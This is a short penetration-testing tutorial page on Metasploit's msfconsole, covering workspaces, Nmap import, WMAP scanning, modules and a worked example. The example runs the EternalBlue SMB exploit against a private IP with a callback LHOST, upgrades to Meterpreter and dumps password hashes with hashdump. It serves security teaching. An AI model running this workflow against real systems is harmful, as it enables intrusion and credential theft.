msfconsole

Workspace

A workspace is a container for organizing and managing penetration testing data.
Use workspace to create, switch, or delete workspaces.

Example:

msf6> workspace -a NewWorkspace  # Add a new workspace
msf6> workspace NewWorkspace     # Switch to the new workspace

setg is used to set global variables that persist across modules and sessions.

msf6> setg RHOSTS 192.168.1.1  # Set global target IP

Importing Nmap Results

Metasploit can import Nmap scan results to populate target information.

msf6> db_import /path/to/nmap_scan.xml

WMAP

web application vulnerability scanner integrated into Metasploit. It is used to identify vulnerabilities in web applications.

msf6> load wmap
msf6> wmap_sites -a http://example.com
msf6> wmap_run -t

Working with Modules

Metasploit is modular, allowing users to perform specific tasks. The main types of modules are:

Auxiliary Modules: Perform information gathering, enumeration, and other non-exploit tasks (e.g., sniffing, fuzzing, or brute-forcing).
Exploit Modules: Designed to exploit vulnerabilities in target systems.
Post-Exploitation Modules: Used after gaining access to a system (e.g., privilege escalation, data extraction).

Searching for Modules:

Use the search command to find modules based on keywords, type, or platform.

msf6> search "key word" type:exploit platform:windows

Using a Module:

After identifying a module, use the use command to select it.

msf6> use exploit/windows/smb/ms17_010_eternalblue

Setting Module Options:

Use options to view required and optional parameters. Set parameters using the set command.

msf6> options
msf6> set RHOSTS 192.168.1.1
msf6> set LHOST 192.168.1.2

Running the Module:

Use run or exploit to execute the module.

msf6> exploit

Post-Exploitation

Upgrading to Meterpreter:
- After gaining a basic shell, upgrade it to a Meterpreter session for advanced post-exploitation capabilities.
- Example:
  msf6> sessions -u <SESSION_ID>

Meterpreter:

A powerful, extensible payload that provides advanced features like file manipulation, keylogging, and privilege escalation.

Example Commands:

meterpreter> sysinfo          # Get system information
meterpreter> getuid           # Check current user privileges
meterpreter> hashdump         # Dump password hashes

References

Metasploit Documentation: The official documentation is a comprehensive resource for understanding and using Metasploit.

Example Workflow

Start msfconsole:
```
$ msfconsole
```

Search for a module:

msf6> search type:exploit platform:windows

Use the module and set options:

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.1
msf6> set LHOST 192.168.1.2

Run the exploit:
```
msf6> exploit
```
Upgrade to Meterpreter:
```
msf6> sessions -u -1
```

Perform post-exploitation tasks:

meterpreter> sysinfo
meterpreter> hashdump

PreviousMetasploit Nextmsfvenom

Last updated 11 months ago

hashtagWorkspace

hashtagImporting Nmap Results

hashtagWMAP

hashtagWorking with Modules

hashtagPost-Exploitation

hashtagReferences

hashtagExample Workflow